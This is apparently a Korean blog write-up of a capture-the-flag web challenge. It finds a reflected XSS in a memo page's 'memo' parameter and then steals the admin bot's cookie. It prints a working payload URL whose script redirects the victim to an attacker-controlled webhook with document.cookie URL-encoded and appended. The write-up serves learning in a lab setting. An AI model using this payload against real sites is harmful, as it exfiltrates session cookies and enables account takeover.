문제 정보입니다.
플래그는 admin의 쿠키 값으로 저장되어 있습니다.
문제 페이지에 접속하면
Home, Memo, Report 총 3가지 페이지가 있습니다.
Report 페이지에서 링크를 관리자 봇에게 보내서 읽게 할 수 있습니다.
메모 페이지에 들어가보면
memo 파라미터의 값을 <article>태그에 적어줍니다.
memo 파라미터에 스크립트 태그를 넣자 실행됩니다.
(XSS 취약점 발견)
이제 리포트 페이지에서 페이로드를 작성합니다.
스크립트 태그를 통해 웹훅 사이트로 리다이렉트시켜 쿠키 값을 받는 구문을 작성합니다.
페이로드는 아래와 같습니다.
http://127.0.0.1/memo?memo=<script>location.href='본인의 웹훅 주소?'%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65;</script>
(+document.cookie는 URL 인코딩해서 작성해줘야 합니다)
플래그가 나왔습니다!
'write-up(web) > G04T' 카테고리의 다른 글
[G04T] Simple XSS 2 (0) | 2022.09.15 |
---|---|
[G04T] Simple SSRF 2 (0) | 2022.09.08 |
[G04T] Simple SSRF 1 (0) | 2022.09.07 |
[G04T] Simple XXE 3 (0) | 2022.09.02 |
[G04T] Simple XXE 2 (0) | 2022.09.01 |